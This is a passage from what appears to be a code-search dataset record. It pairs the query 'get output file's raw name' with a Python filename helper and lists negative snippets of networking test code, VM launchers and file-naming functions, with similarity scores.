args.pop(0)\n elif arg == '--license':\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n license_server = args.pop(0)\n elif arg == '--noshare':\n share = False\n elif arg == '--staticip':\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n static_ip = args.pop(0)\n elif arg == '--netmask':\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n netmask = args.pop(0)\n elif arg == '--gateway':\n if not args:\n print(missing_arg, arg, file=sys.stderr)\n return\n gateway = args.pop(0)\n else:\n print('unrecognized option:', arg, file=sys.stderr)\n return\n\n if not vm_image:\n builds = self._qm.get_available_stc_builds()\n if not builds:\n print('unable to find latest build', file=sys.stderr)\n return\n vm_image = '#' + builds[0]\n\n try:\n vm_ids = self._qm.start_stc_vm(\n self._user, vm_image, ttl_minutes, socket, desc, instances,\n host, share, vlan, memory, cores, external, ntp_server,\n license_server, static_ip, netmask, gateway)\n except Exception as e:\n print('ERROR:', e, file=sys.stderr)\n return\n\n print('Started new vm instances of', vm_image)\n print('\\n'.join(vm_ids))", "def tcp_start(self, flow: mitmproxy.tcp.TCPFlow):", "def setUp(self):\n import protolibs.ics_servers as ics_servers\n from point import Point\n 
from configobj import ConfigObj\n\n # Get config file\n configfile = '/'.join(['sims', 'tcptank', 'config'])\n config=ConfigObj(infile=configfile, unrepr=True)\n self.config = config\n #Set global variable devconfig here \n devconfig=config['vdevs']['slave'] \n\n ##--Set up points\n points={}\n for p in devconfig['points']:\n points.update( { p['name'] : Point(**p) } ) \n #The ** treats the p dictionary as the arguments to the Point class\n self.server = ics_servers.ModbusTCP( devconfig['icsifaces'][0], points.values() )\n self.server.start()", "def _spawn_vapv(self, hostnames, lb):\n identifier = self.openstack_connector.get_identifier(lb)\n # Initialize lists of items to clean up if operation fails\n port_ids = []\n security_groups = []\n vms = []\n try: # For rolling back objects if failure occurs...\n # Create ports...\n ports = {}\n if cfg.CONF.lbaas_settings.management_mode == \"FLOATING_IP\":\n # Primary data port (floating IP)\n (port, sec_grp, mgmt_ip) = self.openstack_connector.create_port(\n lb, hostnames[0], create_floating_ip=True, cluster=True,\n identifier=identifier\n )\n ports[hostnames[0]] = {\n \"ports\": {\n \"data\": port,\n \"mgmt\": None\n },\n \"mgmt_ip\": mgmt_ip,\n \"cluster_ip\": port['fixed_ips'][0]['ip_address']\n }\n port_ids.append(port['id'])\n security_groups = [sec_grp]\n # Secondary data port (floating IP)\n (port, junk, mgmt_ip) = self.openstack_connector.create_port(\n lb, hostnames[1], security_group=sec_grp,\n create_floating_ip=True, cluster=True\n )\n ports[hostnames[1]] = {\n \"ports\": {\n \"data\": port,\n \"mgmt\": None\n },\n \"mgmt_ip\": mgmt_ip,\n \"cluster_ip\": port['fixed_ips'][0]['ip_address']\n }\n port_ids.append(port['id'])\n elif cfg.CONF.lbaas_settings.management_mode == \"MGMT_NET\":\n # Primary data port (management network)\n (data_port, data_sec_grp, junk) = self.openstack_connector.create_port(\n lb, hostnames[0], cluster=True, identifier=identifier\n )\n # Primary mgmt port (management network)\n (mgmt_port, mgmt_sec_grp, mgmt_ip) = self.openstack_connector.create_port(\n lb, hostnames[0], mgmt_port=True, cluster=True, identifier=identifier\n )\n ports[hostnames[0]] = {\n \"ports\": {\n \"data\": data_port,\n \"mgmt\": mgmt_port\n },\n \"mgmt_ip\": mgmt_ip,\n \"cluster_ip\": mgmt_ip\n }\n security_groups = [data_sec_grp, mgmt_sec_grp]\n port_ids.append(data_port['id'])\n port_ids.append(mgmt_port['id'])\n # Secondary data port (management network)\n (data_port, sec_grp, junk) = self.openstack_connector.create_port(\n lb, hostnames[1], security_group=data_sec_grp, cluster=True\n )\n # Secondary mgmt port (management network)\n (mgmt_port, junk, mgmt_ip) = self.openstack_connector.create_port(\n lb, hostnames[1], mgmt_port=True, security_group=mgmt_sec_grp,\n cluster=True\n )\n ports[hostnames[1]] = {\n \"ports\": {\n \"data\": data_port,\n \"mgmt\": mgmt_port\n },\n \"mgmt_ip\": mgmt_ip,\n \"cluster_ip\": mgmt_ip\n }\n port_ids.append(data_port['id'])\n port_ids.append(mgmt_port['id'])\n\n # Create instances...\n try:\n bandwidth = lb.bandwidth\n if bandwidth == 0:\n raise AttributeError()\n except AttributeError:\n bandwidth = self._get_setting(\n lb.tenant_id, \"services_director_settings\", \"bandwidth\"\n )\n avoid = None\n for host in hostnames:\n # Launch vAPV...\n vm = self.openstack_connector.create_vapv(\n host, lb, ports[host]['ports'], avoid\n )\n vms.append(vm['id'])\n # Set params for next iteration...\n if cfg.CONF.lbaas_settings.allow_different_host_hint is True:\n avoid = vm['id']\n\n except Exception as e:\n if 
cfg.CONF.lbaas_settings.roll_back_on_error is True:\n self.openstack_connector.clean_up(\n instances=vms,\n security_groups=security_groups,\n ports=port_ids\n )\n raise e", "def run(host, tasks, procsPerTask, memFracPerTask, outputLoc, primaryIP, allocation,\n instance, localIP):\n argStr = ' '.join(sys.argv[1:])\n #argStr = ' '.join([str(i) for i in locals().values()]) # do not move this line.\n #TODO: Determine logDir value.\n logDir = \"\"\n\n #os.system(\"sleep 15\")\n os.system(\"python {0} {1} &\".format(join(dirname(__file__), \"networking.py\"), argStr))\n os.system(\"sleep 20\")\n port = 13001\n buf = 1024\n tcpsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n m_addr = (primaryIP, port)\n tcpsocket.connect(m_addr)\n register_command = \"register\\t{0}\\t{1}\".format(host, tasks)\n os.system(\"echo {0} >> {1}\".format(register_command, join(logDir, \"sent.log\")))\n tcpsocket.send(register_command)\n tcpsocket.close()", "def test_start_vms(self):\n testflow.step(\"Check if VM's started on different hosts\")\n assert (\n ll_vms.get_vm_host(vm_name=conf.VM_NAME[0]) !=\n ll_vms.get_vm_host(vm_name=conf.VM_NAME[1])\n )", "def test_otoroshi_controllers_adminapi_templates_controller_initiate_tcp_service_tcp(self):\n pass", "def setUp(self):\n super().setUp()\n for intf in self.send_ifs:\n self.vapi.ip_reassembly_enable_disable(\n sw_if_index=intf.sw_if_index, enable_ip4=True\n )\n self.vapi.ip_reassembly_set(\n timeout_ms=0,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n expire_walk_interval_ms=10,\n )\n self.virtual_sleep(0.25)\n self.vapi.ip_reassembly_set(\n timeout_ms=1000000,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n expire_walk_interval_ms=10000,\n )", "def setUp(self):\n super().setUp()\n self.vapi.ip_reassembly_enable_disable(\n sw_if_index=self.src_if.sw_if_index,\n enable_ip4=True,\n type=VppEnum.vl_api_ip_reass_type_t.IP_REASS_TYPE_SHALLOW_VIRTUAL,\n )\n self.vapi.ip_reassembly_set(\n timeout_ms=0,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n type=VppEnum.vl_api_ip_reass_type_t.IP_REASS_TYPE_SHALLOW_VIRTUAL,\n expire_walk_interval_ms=10,\n )\n self.virtual_sleep(0.25)\n self.vapi.ip_reassembly_set(\n timeout_ms=1000000,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n type=VppEnum.vl_api_ip_reass_type_t.IP_REASS_TYPE_SHALLOW_VIRTUAL,\n expire_walk_interval_ms=10000,\n )", "def __init__(self, name=None, start=True, *args, **kwargs):\n name = \"VM_TEMPL_1\" if name is None else name\n super(MgmtVM, self).__init__(name=name, start=start, *args, **kwargs)\n\n #self.add_proc(rift.vcs.MsgBrokerTasklet())\n self.add_proc(rift.vcs.DtsRouterTasklet())\n self.add_proc(rift.vcs.DtsPerfTasklet())\n #self.add_proc(rift.vcs.LogdTasklet())\n\n self.add_proc(rift.vcs.procs.RiftCli());\n\n #Confd would need RestConf present\n self.add_proc(rift.vcs.uAgentTasklet())\n #self.add_proc(rift.vcs.Confd())\n self.add_proc(rift.vcs.RestconfTasklet())\n self.add_proc(rift.vcs.Watchdog())\n self.add_proc(RedisServer())\n\n #self.add_proc(rift.vcs.Webserver())\n #self.add_proc(rift.vcs.RedisCluster())", "def setUp(self):\n super().setUp()\n self.vapi.ip_reassembly_enable_disable(\n sw_if_index=self.src_if.sw_if_index,\n enable_ip6=True,\n type=VppEnum.vl_api_ip_reass_type_t.IP_REASS_TYPE_SHALLOW_VIRTUAL,\n )\n self.vapi.ip_reassembly_set(\n timeout_ms=0,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n type=VppEnum.vl_api_ip_reass_type_t.IP_REASS_TYPE_SHALLOW_VIRTUAL,\n expire_walk_interval_ms=10,\n is_ip6=1,\n )\n 
self.virtual_sleep(0.25)\n self.vapi.ip_reassembly_set(\n timeout_ms=1000000,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n type=VppEnum.vl_api_ip_reass_type_t.IP_REASS_TYPE_SHALLOW_VIRTUAL,\n expire_walk_interval_ms=10000,\n is_ip6=1,\n )", "def test_ft_VxLAN_TrafficMultiAVPNVP(topology,\n testlog,\n config,\n get_switch_mac,\n get_host_macs,\n traffic_permutation,\n l2_basic_phy,\n l3_basic_phy):\n\n \"\"\"\n Step: Create the topology as shown\n Result: Topology created successfully\n \"\"\"\n testlog.log_step(\"Set up the switch and hosts\")\n s1 = topology.get('ops1')\n h1 = topology.get('hs1')\n h2 = topology.get('hs2')\n h3 = topology.get('hs3')\n h4 = topology.get('hs4')\n\n argv = generate_params(s1)\n\n \"\"\"\n Step: Configure the topology as shown\n Result: Topology has been configured successfully\n \"\"\"\n # Configuring VLAN and four interfaces on switch 1\n testlog.log_subheader(\"Creating L2 Interfaces\")\n config.create_l2_interface_type(s1,\n l2_basic_phy['l2_iface'],\n False, False,\n [argv['phy_ports'][0]],\n argv['vlan_ids'][0],\n None, testlog)\n\n config.create_l2_interface_type(s1,\n l2_basic_phy['l2_iface'],\n False, False,\n [argv['phy_ports'][1]],\n argv['vlan_ids'][0],\n None, testlog)\n\n testlog.log_subheader(\"Creating SVIs\")\n # Creating SVI interfaces of if03 and if04\n config.create_l2_interface_type(s1,\n l2_basic_phy['l2_iface'],\n False, False,\n [argv['phy_ports'][2]],\n argv['vlan_ids'][1],\n None, testlog)\n\n config.create_l2_interface_type(s1,\n l2_basic_phy['l2_iface'],\n False, False,\n [argv['phy_ports'][3]],\n argv['vlan_ids'][2],\n None, testlog)\n\n configure_switch_vlan(s1,\n argv['vlan_ids'][1],\n S1_SVI_IP_1 + '/' + MASK,\n [argv['phy_ports'][2]])\n\n configure_switch_vlan(s1,\n argv['vlan_ids'][2],\n S1_SVI_IP_2 + '/' + MASK,\n [argv['phy_ports'][3]])\n\n testlog.log_subheader(\"Creating Switch Loopback Interface\")\n # Creating a loopback interface on s1\n config.create_l3_loopback(s1,\n '0',\n S1_LO_IP + '/' + MASK)\n\n testlog.log_subheader(\"Configure Host IPs\")\n configure_host_ips(h3, h4, argv['ip_address_hs'])\n\n testlog.log_subheader(\"Configuring IP Routes from NVPs to 20.0.0.2\")\n config.switch_add_route(s1, VTEP_PEER_IP, DEST_MASK, H3_IP)\n config.switch_add_route(s1, VTEP_PEER_IP, DEST_MASK, H4_IP)\n\n \"\"\"\n Step: Configure VxLAN interface on switch 1\n Result: VxLAN interface has been configured successfully\n \"\"\"\n testlog.log_step(\"Configure VXLAN\")\n config.configure_vxlan(s1,\n TUN_NUM,\n S1_LO_IP,\n argv['vnis'])\n testlog.log_subheader(\"Current Running Configuration\")\n s1.libs.vtysh.show_running_config()\n\n \"\"\"\n Step: Generate traffic type using Scapy on all hosts\n Result: Traffic successfully created\n \"\"\"\n testlog.log_step(\"Start Scapy on hosts\")\n # Starting scapy\n start_stop_scapy_on_hosts(h1)\n start_stop_scapy_on_hosts(h2)\n start_stop_scapy_on_hosts(h3)\n start_stop_scapy_on_hosts(h4)\n\n \"\"\"\n Step: Use scapy to configure the traffic from AVP to all hosts\n Result: Packet created\n \"\"\"\n # Configure Scapy on hs1 for AVP-->All traffic\n step_desc = \"Configure traffic from AVP1\"\n testlog.log_step(step_desc)\n\n cur_src_MAC = AVP_MAC\n cur_dst_MAC = NVP_MAC\n packet_avp = scapy_configuration_avp(h1, pkt_type=PKT_TYPE,\n macsrc=cur_src_MAC, macdst=cur_dst_MAC)\n\n \"\"\"\n Step: Transmit the traffic from AVP to all hosts and\n parse the captured packet to check\n if the packet is received as expected\n Result: Traffic transmitted successfully and\n Correct values 
received\n \"\"\"\n\n # Updating step_desc based on traffic type\n if (PKT_TYPE == \"l2_basic\"):\n step_desc = \"Transmit from AVP1 (Packet Type: Unknown Unicast)\\n\" + \\\n \"\\t Intended Receivers: AVP2, NVP1/NVP2\"\n else:\n step_desc = \"Transmit from AVP1 (Packet Type: {})\\n\".format(PKT_TYPE) + \\\n \"\\t Intended Receivers: AVP2, NVP1/NVP2\"\n\n testlog.log_step(step_desc)\n\n # Dictionary of Booleans for each host\n # True means Packet expected at host and False: Packets not expected at host\n pkts_expected_dict = {\"AVP1\": False, \"AVP2\": True, \"ECMP group\": True}\n # Sending traffic from AVP h1 to all other hosts\n with ThreadGroup() as ctx:\n # Sniffing on hs2 (AVP)\n ctx.run(sniff_traffic, hs=h2, count=SNIFF_PKT_COUNT, timeout=TIMEOUT,\n recipient_type=\"AVP2 (h2)\", pkt_type=PKT_TYPE,\n exp_src=cur_src_MAC, exp_dst=cur_dst_MAC, testlog=testlog)\n # Sniffing on hs3 (NVP)\n ctx.run(sniff_traffic, hs=h3, count=SNIFF_PKT_COUNT, timeout=TIMEOUT,\n recipient_type=\"NVP1 (h3)\", pkt_type=PKT_TYPE,\n exp_src=cur_src_MAC, exp_dst=cur_dst_MAC, testlog=testlog)\n # Sniffing on hs4 (NVP)\n ctx.run(sniff_traffic, hs=h4, count=SNIFF_PKT_COUNT, timeout=TIMEOUT,\n recipient_type=\"NVP2 (h4)\", pkt_type=PKT_TYPE,\n exp_src=cur_src_MAC, exp_dst=cur_dst_MAC, testlog=testlog)\n ctx.run(start_traffic, hs=h1, packet=packet_avp, count=PKT_COUNT)\n\n # Checking Transmission Results\n print_transmission_results(pkts_expected_dict, PKT_COUNT, testlog)\n\n print(RECEIVED_PKT_DICT)\n RECEIVED_PKT_DICT.clear()\n\n \"\"\"\n Step: Check if MAC is learnt as expected\n Result: Source MAC is present in switch MAC table\n \"\"\"\n testlog.log_step(\"Check MAC Learning\")\n # Verifying if MAC A was learned on if01\n verify_mac = retry(\n stop_max_attempt_number=3,\n wait_fixed=1000)(verify_mac_table)\n verify_mac(sw1=s1, mac=cur_src_MAC, exp_port=argv['phy_ports'][0],\n exp_vlan=VLAN1, vtep_peer=None)\n\n # Update src MAC and dst MAC based on packet type\n dst_MAC_dict = {\"l2_basic\": AVP1_MAC, \"stp\": STP_DEST_MAC,\n \"broadcast\": BROADCAST_MAC, \"multicast\": MULTICAST_MAC,\n \"lldp\": LLDP_MAC}\n\n cur_src_MAC = NVP1_MAC\n cur_dst_MAC = dst_MAC_dict[PKT_TYPE]\n\n \"\"\"\n Step: Use scapy to configure the traffic for NVP to all hosts\n Result: Packet created\n \"\"\"\n step_desc = \"Configure traffic from NVP1\"\n testlog.log_step(step_desc)\n\n # Configure Scapy on hs1 for NVP-->All traffic\n packet_nvp = scapy_configuration_nvp(h3, pkt_type=PKT_TYPE,\n inner_macsrc=cur_src_MAC,\n inner_macdst=cur_dst_MAC, vni=VNI,\n src_port=UDP_SPORT, dst_port=UDP_DPORT,\n src_IP=SRC_IP, dst_IP=DST_IP,\n outer_macsrc=OUTER_SRC_MAC,\n outer_macdst=OUTER_DST_MAC)\n\n \"\"\"\n Step: Transmit the traffic from NVP to all hosts and\n parse the captured packet to check\n if the packet is received as expected\n Result: Traffic transmitted successfully and\n Correct values received\n \"\"\"\n # Updating step_desc based on traffic type\n if (PKT_TYPE == \"l2_basic\"):\n step_desc = \"Transmit from NVP1 (Packet Type: Known Unicast)\\n\" + \\\n \"\\t Intended Receivers: AVP1\"\n else:\n step_desc = \"Transmit from NVP1 (Packet Type: {})\\n\".format(PKT_TYPE) + \\\n \"\\t Intended Receivers: AVP1, AVP2\"\n testlog.log_step(step_desc)\n\n # If broadcast, multicast or BPDU, packet is flooded to both AVPs\n pkts_expected_dict = {\"AVP1\": True, \"AVP2\": True, \"ECMP group\": False}\n\n # If l2 basic, packet is known unicast packet and only received at AVP1\n if (PKT_TYPE == \"l2_basic\"):\n pkts_expected_dict = {\"AVP1\": True, 
\"AVP2\": False, \"ECMP group\": False}\n\n # Sending traffic from NVP1 h3 to all other hosts\n with ThreadGroup() as ctx:\n # Sniffing on h1 (AVP1)\n ctx.run(sniff_traffic, hs=h1, count=SNIFF_PKT_COUNT, timeout=TIMEOUT,\n recipient_type=\"AVP1 (h1)\", pkt_type=PKT_TYPE,\n exp_src=cur_src_MAC, exp_dst=cur_dst_MAC, testlog=testlog)\n # Sniffing on h2 (AVP2)\n ctx.run(sniff_traffic, hs=h2, count=SNIFF_PKT_COUNT, timeout=TIMEOUT,\n recipient_type=\"AVP2 (h2)\", pkt_type=PKT_TYPE,\n exp_src=cur_src_MAC, exp_dst=cur_dst_MAC, testlog=testlog)\n # Sniffing on h4 (NVP2)\n ctx.run(sniff_traffic, hs=h4, count=SNIFF_PKT_COUNT, timeout=TIMEOUT,\n recipient_type=\"NVP2 (h4)\", pkt_type=PKT_TYPE,\n exp_src=cur_src_MAC, exp_dst=cur_dst_MAC, testlog=testlog)\n ctx.run(start_traffic, hs=h3, packet=packet_nvp, count=PKT_COUNT)\n\n # Checking Transmission Results\n print_transmission_results(pkts_expected_dict, PKT_COUNT, testlog)\n print(RECEIVED_PKT_DICT)\n RECEIVED_PKT_DICT.clear()\n\n \"\"\"\n Step: Check if MAC is learnt as expected\n Result: Source MAC is present in switch MAC table\n \"\"\"\n\n testlog.log_step(\"Check MAC Learning\")\n # Verifying if NVP1_MAC was learned on interface vxlan 1\n verify_mac(sw1=s1, mac=cur_src_MAC, exp_port=\"vxlan1\",\n exp_vlan=VLAN1, vtep_peer=VTEP_PEER_IP)\n\n \"\"\"\n Step: Transmit the traffic from NVP to all hosts and\n parse the captured packet to check\n if the packet is received as expected\n Result: Traffic transmitted successfully and\n Correct values received\n \"\"\"\n # Updating step_desc based on traffic type\n step_desc = \"Transmit from AVP1. Permuting Source MAC to Test ECMP Load Balancing\"\n testlog.log_step(step_desc)\n\n # If broadcast, multicast or BPDU, packet is sent to AVP2 and ECMP group\n pkts_expected_dict = {\"AVP1\": False, \"AVP2\": True, \"ECMP group\": True}\n\n # If l2 basic, packet is known unicast packet and only received at ECMP group\n if (PKT_TYPE == \"l2_basic\"):\n pkts_expected_dict = {\"AVP1\": True, \"AVP2\": False, \"ECMP group\": True}\n\n # Creating a list of potential source MACs\n lst_source_macs = ['00:00:00:00:00:{}'.format(\n i) for i in range(21, 21+TOTAL_MACS)]\n cur_src_MAC = lst_source_macs\n cur_dst_MAC = NVP_MAC\n\n packet_avp_lst = scapy_configuration_avp(h1, pkt_type=PKT_TYPE,\n macsrc=cur_src_MAC, macdst=cur_dst_MAC)\n\n with ThreadGroup() as ctx:\n # Sniffing on hs2 (AVP)\n ctx.run(sniff_traffic, hs=h2, count=TOTAL_MACS+10, timeout=LONG_TIMEOUT,\n recipient_type=\"AVP2 (h2)\", pkt_type=PKT_TYPE,\n exp_src=cur_src_MAC, exp_dst=cur_dst_MAC, testlog=testlog)\n # Sniffing on hs3 (NVP)\n ctx.run(sniff_traffic, hs=h3, count=TOTAL_MACS+10, timeout=LONG_TIMEOUT,\n recipient_type=\"NVP1 (h3)\", pkt_type=PKT_TYPE,\n exp_src=cur_src_MAC, exp_dst=cur_dst_MAC, testlog=testlog)\n # Sniffing on hs4 (NVP)\n ctx.run(sniff_traffic, hs=h4, count=TOTAL_MACS+10, timeout=LONG_TIMEOUT,\n recipient_type=\"NVP2 (h4)\", pkt_type=PKT_TYPE,\n exp_src=cur_src_MAC, exp_dst=cur_dst_MAC, testlog=testlog)\n ctx.run(start_traffic, hs=h1, packet=packet_avp_lst, count=1)\n\n print(RECEIVED_PKT_DICT)\n\n # Call check_load_balancing helper function to\n check_load_balancing(testlog)\n\n RECEIVED_PKT_DICT.clear()\n testlog.log_step(\"Stop Scapy on hosts\")\n # Stopping scapy\n start_stop_scapy_on_hosts(h1, action='stop')\n start_stop_scapy_on_hosts(h2, action='stop')\n start_stop_scapy_on_hosts(h3, action='stop')\n start_stop_scapy_on_hosts(h4, action='stop')", "def dvs_ping_without_fip(self):\n self.show_step(1)\n 
self.env.revert_snapshot(\"dvs_vcenter_systest_setup\")\n cluster_id = self.fuel_web.get_last_created_cluster()\n\n os_ip = self.fuel_web.get_public_vip(cluster_id)\n os_conn = os_actions.OpenStackActions(\n os_ip, SERVTEST_USERNAME,\n SERVTEST_PASSWORD,\n SERVTEST_TENANT)\n\n tenant = os_conn.get_tenant(SERVTEST_TENANT)\n\n # Create security group with rules for ssh and ping\n security_group = os_conn.create_sec_group_for_ssh()\n\n _s_groups = os_conn.neutron.list_security_groups()['security_groups']\n _srv_tenat = os_conn.get_tenant(SERVTEST_TENANT).id\n default_sg = [sg for sg in _s_groups\n if sg['tenant_id'] == _srv_tenat and\n sg['name'] == 'default'][0]\n\n self.show_step(2)\n logger.info('Create network {}'.format(self.net_data[0].keys()[0]))\n net_1 = os_conn.create_network(network_name=self.net_data[0].keys()[0],\n tenant_id=tenant.id)['network']\n\n self.show_step(3)\n subnet = os_conn.create_subnet(\n subnet_name=net_1['name'],\n network_id=net_1['id'],\n cidr=self.net_data[0][self.net_data[0].keys()[0]],\n ip_version=4)\n\n # Check that network are created.\n assert_true(os_conn.get_network(net_1['name'])['id'] == net_1['id'])\n\n # Create Router_01, set gateway and add interface to external network\n router_1 = os_conn.create_router('router_1', tenant=tenant)\n\n self.show_step(4)\n os_conn.add_router_interface(router_id=router_1[\"id\"],\n subnet_id=subnet[\"id\"])\n\n access_point, access_point_ip = openstack.create_access_point(\n os_conn=os_conn,\n nics=[{'net-id': net_1['id']}],\n security_groups=[security_group.name, default_sg['name']])\n\n self.show_step(5)\n self.show_step(6)\n openstack.create_instances(os_conn=os_conn,\n nics=[{'net-id': net_1['id']}],\n vm_count=1,\n security_groups=[default_sg['name']])\n openstack.verify_instance_state(os_conn)\n\n # Get private ips of instances\n instances = [instance for instance in os_conn.get_servers()\n if instance.id != access_point.id]\n ips = [os_conn.get_nova_instance_ip(i, net_name=net_1['name'])\n for i in instances]\n\n self.show_step(7)\n ip_pair = dict.fromkeys(ips)\n for key in ip_pair:\n ip_pair[key] = [self.external_ip]\n openstack.check_connection_through_host(access_point_ip, ip_pair)", "def begin_sending_packets():\n monitoru = main_monitoring.MainMonitoring()\n monitoru.start_monitor_loop()", "def test_06_migrate_vm_live_attach_disk(self):\n \n global vm\n global data_disk_1\n data_disk_1 = self.helper.create_custom_disk(\n self.apiclient,\n {\"diskname\":\"StorPoolDisk\" },\n zoneid=self.zone.id,\n size = 5,\n miniops = 2000,\n maxiops = 5000,\n account=self.account.name,\n domainid=self.account.domainid,\n diskofferingid=self.disk_offerings.id,\n )\n\n self.debug(\"Created volume with ID: %s\" % data_disk_1.id)\n\n self.virtual_machine_live_migration_1.attach_volume(\n self.apiclient,\n data_disk_1\n )\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient, vm, self.host)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_1, destinationHost)\n\n\n self.virtual_machine_live_migration_1.attach_volume(\n self.apiclient,\n self.volume\n )\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient,vm, self.host)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_1, destinationHost)\n\n destinationHost, vol_list = 
self.helper.get_destination_pools_hosts(self.apiclient,vm, self.host)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)", "def setUp(self):\n super().setUp()\n self.vapi.ip_reassembly_enable_disable(\n sw_if_index=self.src_if.sw_if_index, enable_ip4=True\n )\n self.vapi.ip_reassembly_set(\n timeout_ms=0,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n expire_walk_interval_ms=10,\n )\n self.virtual_sleep(0.25)\n self.vapi.ip_reassembly_set(\n timeout_ms=1000000,\n max_reassemblies=1000,\n max_reassembly_length=1000,\n expire_walk_interval_ms=10000,\n )", "def test_traffic_paging_flow(self):\n # Need to delete all default flows in table 0 before\n # install the specific flows test case.\n self.classifier_controller._delete_all_flows()\n\n ue_ip_addr = \"192.168.128.30\"\n self.classifier_controller.install_paging_flow(\n 200,\n IPAddress(version=IPAddress.IPV4, address=ue_ip_addr.encode('utf-8')),\n True,\n )\n # Create a set of packets\n pkt_sender = ScapyPacketInjector(self.BRIDGE)\n eth = Ether(dst=self.MAC_1, src=self.MAC_2)\n ip = IP(src=self.Dst_nat, dst='192.168.128.30')\n o_udp = UDP(sport=2152, dport=2152)\n i_udp = UDP(sport=1111, dport=2222)\n i_tcp = TCP(seq=1, sport=1111, dport=2222)\n i_ip = IP(src='192.168.60.142', dst=self.EnodeB_IP)\n\n gtp_packet_udp = eth / ip / o_udp / GTP_U_Header(teid=0x1, length=28, gtp_type=255) / i_ip / i_udp\n gtp_packet_tcp = eth / ip / o_udp / GTP_U_Header(teid=0x1, length=68, gtp_type=255) / i_ip / i_tcp\n\n # Check if these flows were added (queries should return flows)\n flow_queries = [\n FlowQuery(\n self._tbl_num, self.testing_controller,\n match=MagmaMatch(tunnel_id=1, in_port=32768),\n ),\n FlowQuery(\n self._tbl_num, self.testing_controller,\n match=MagmaMatch(ipv4_dst='192.168.128.30'),\n ),\n ]\n # =========================== Verification ===========================\n # Verify 2 flows installed for classifier table (2 pkts matched)\n\n flow_verifier = FlowVerifier(\n [\n FlowTest(\n FlowQuery(\n self._tbl_num,\n self.testing_controller,\n ), 2, 2,\n ),\n ], lambda: wait_after_send(self.testing_controller),\n )\n\n snapshot_verifier = SnapshotVerifier(\n self, self.BRIDGE,\n self.service_manager,\n )\n\n with flow_verifier, snapshot_verifier:\n pkt_sender.send(gtp_packet_udp)\n pkt_sender.send(gtp_packet_tcp)\n\n flow_verifier.verify()" ]
[ "0.7372693", "0.59777474", "0.58827966", "0.5760567", "0.5757512", "0.5692496", "0.5627953", "0.5596239", "0.5572661", "0.5571036", "0.55461", "0.55419725", "0.55401415", "0.5530725", "0.552947", "0.55276793", "0.5517556", "0.5503944", "0.54876393", "0.5487193", "0.5486951", "0.5484048", "0.54690367", "0.54651725", "0.5461554", "0.54597443", "0.5455941", "0.54485464", "0.54461366", "0.5440754" ]
0.664063
1
get output file's raw name, without .txt or .csv
def get_output_raw_name(journal_file_name, output_type='txt'):
    dot_pos = journal_file_name.rfind('.')
    if dot_pos != -1:
        output_file_name = journal_file_name[0: dot_pos]
    else:
        output_file_name = journal_file_name
    num_of_output = 1
    if output_type == 'txt':
        while True:
            output_file = '%s_%d.txt'%(output_file_name,num_of_output)
            if not os.path.exists(output_file):
                break
            else:
                num_of_output += 1
    else:
        output_file = '%s.%s'%(output_file_name,output_type)
    return output_file
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getOutputFilename(self, filename):\n return filename[:-4] + \".txt\"", "def get_file_name(self):\n return str(self.get_file())", "def _get_output_filename(dataset_dir, split_name):\n return '%s/%s*.tfrecord' % (dataset_dir, split_name)", "def _get_raw_output_fp(self, output_dir, params):\r\n return join(output_dir, 'raw_output.txt')", "def out_filename(self, filetype, format='old', dir=Location.OUT_DIR):\n filename = self.filename(filetype=filetype, format=format)\n #return Path(dir) / filename\n return filename", "def out_filename(self, filetype, format='old', dir=Location.OUT_DIR):\n filename = self.filename(filetype=filetype, format=format)\n # return Path(dir) / filename\n return filename", "def get_filename(output_dir, accountname):\n f_name = 'twitter_data_' + accountname + str(datetime.datetime.utcnow()) + '.csv'# start_time + '_' + end_time\n full_path = output_dir + '/' + f_name\n\n return full_path", "def get_output_file_type(self):\n file_name = '.' + self.template_file_name.split('.')[-2]\n return file_name", "def out_filename(self, filetype, dir, format='old'):\n filename = self.filename(filetype=filetype, format=format)\n return Path(dir) / filename", "def _get_output_filename(dataset_dir, split_name):\n return '%s/fer_%s.tfrecord' % (dataset_dir, split_name)", "def _get_output_filename(dataset_dir, split_name):\n return '%s/cifar100_%s.tfrecord' % (dataset_dir, split_name)", "def get_output_file(path):\n root, _ = os.path.splitext(path)\n return os.path.basename(root) + get_task_number() + \".txt\"", "def filename(self):\n translator = {ord(\" \"): \"_\", ord(\",\"): None}\n return f'{self._full_name.translate(translator)}.txt'", "def _get_raw_output_fp(self,\r\n output_dir,\r\n params):\r\n return join(output_dir, 'bwa_raw_out.sam')", "def _get_raw_output_fp(self,\r\n output_dir,\r\n params):\r\n return join(output_dir, 'out.uc')", "def get_file_name(self):\n return self.path.name[6:]", "def GetFileName():\r\n d = GetData()\r\n return d.filename", "def get_file_inter_name(self):\n\t\tf = tempfile.NamedTemporaryFile(encoding='utf-8',mode='r',delete=False)\n\t\tf.close()\n\t\treturn f.name", "def get_csv_file_name(output_dir, file_prefix, file_suffix):\n\tcsv_filename = \"\".join([file_prefix, '_', file_suffix, '.csv'])\n\treturn os.path.join(output_dir, csv_filename)", "def get_output_name(input_path):\n file_name, file_ext = os.path.splitext(os.path.basename(input_path))\n return os.path.abspath(\"out\" + os.path.sep + file_name + \"_geo\" + file_ext)", "def name(self):\n #type: ()->Text\n return (\n os.path.splitext(os.path.basename(self.fileName))[0])", "def get_output_file_name(run_parameters, dir_name_key, prefix_string, suffix_string='', type_suffix='tsv'):\n output_file_name = os.path.join(run_parameters[dir_name_key], prefix_string + '_' +\n run_parameters['method'] + '_' + 